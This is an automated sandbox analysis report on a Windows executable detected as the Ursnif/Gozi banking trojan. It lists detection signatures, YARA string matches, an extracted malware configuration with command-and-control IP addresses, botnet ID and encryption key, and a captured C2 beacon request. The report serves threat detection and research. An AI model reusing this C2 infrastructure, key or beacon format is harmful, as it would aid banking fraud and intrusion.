
Windows Analysis Report
server_(3).exe

Overview

General Information

Sample Name: server_(3).exe
Analysis ID: 830450
MD5: aa37b36ea7ba39b6c00ae1b01bada3f7
SHA1: 90545746e5b23fcdf7db1fa5c30588df2f4c31bf
SHA256: a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7
Tags: agenziaentrate, exe, gozi, isfb, ITA, mef, mise, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • server_(3).exe (PID: 1236 cmdline: C:\Users\user\Desktop\server_(3).exe MD5: AA37B36EA7BA39B6C00AE1B01BADA3F7)
  • cleanup
Name: Gozi, Ursnif
Description: 2000 Ursnif aka Snifula; 2006 Gozi v1.0, Gozi CRM, CRM, Papras; 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest. In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings
00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
    00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_261f5ac5 | unknown | unknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
      00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
      • 0x1228:$a1: /C ping localhost -n %u && del "%s"
      • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xa9c:$a5: filename="%.4u.%lu"
      • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe6d:$a9: &whoami=%s
      • 0xe56:$a10: %u.%u_%u_%u_x%u
      • 0xd63:$a11: size=%u&hash=0x%08x
      • 0xb1d:$a12: &uptime=%u
      • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
      • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      No Sigma rule has matched
      Timestamp: 03/20/23-11:48:17.902010
      Source IP: 192.168.2.4
      Destination IP: 62.173.142.81
      SID: 2033204
      Source Port: 49695
      Destination Port: 80
      Protocol: TCP
      Classtype: A Network Trojan was detected

      Timestamp: 03/20/23-11:48:17.902010
      Source IP: 192.168.2.4
      Destination IP: 62.173.142.81
      SID: 2033203
      Source Port: 49695
      Destination Port: 80
      Protocol: TCP
      Classtype: A Network Trojan was detected


      AV Detection

      Source: server_(3).exe | ReversingLabs: Detection: 38%
      Source: server_(3).exe | Virustotal: Detection: 37%
      Source: server_(3).exe | Joe Sandbox ML: detected
      Source: 0.2.server_(3).exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.580746978.0000000002729000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_005E1508

      Compliance

      Source: C:\Users\user\Desktop\server_(3).exe | Unpacked PE file: 0.2.server_(3).exe.400000.0.unpack
      Source: server_(3).exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server_(3).exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Networking

      Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49695 -> 62.173.142.81:80
      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49695 -> 62.173.142.81:80
      Source: Joe Sandbox View | ASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
      Source: global traffic | HTTP traffic detected:
        GET /drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlk HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
        Host: 62.173.142.81
        Connection: Keep-Alive
        Cache-Control: no-cache
      Source: unknown | DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: server_(3).exe, 00000000.00000002.580737497.000000000238C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://62.173
      Source: unknown | DNS traffic detected: queries for: checklist.skype.com

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      Source: Yara match | File source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR

      E-Banking Fraud

      Source: Yara match | File source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_005E1508

      System Summary

      Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.580571515.00000000004D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\server_(3).exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server_(3).exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server_(3).exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server_(3).exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\server_(3).exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server_(3).exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server_(3).exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server_(3).exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
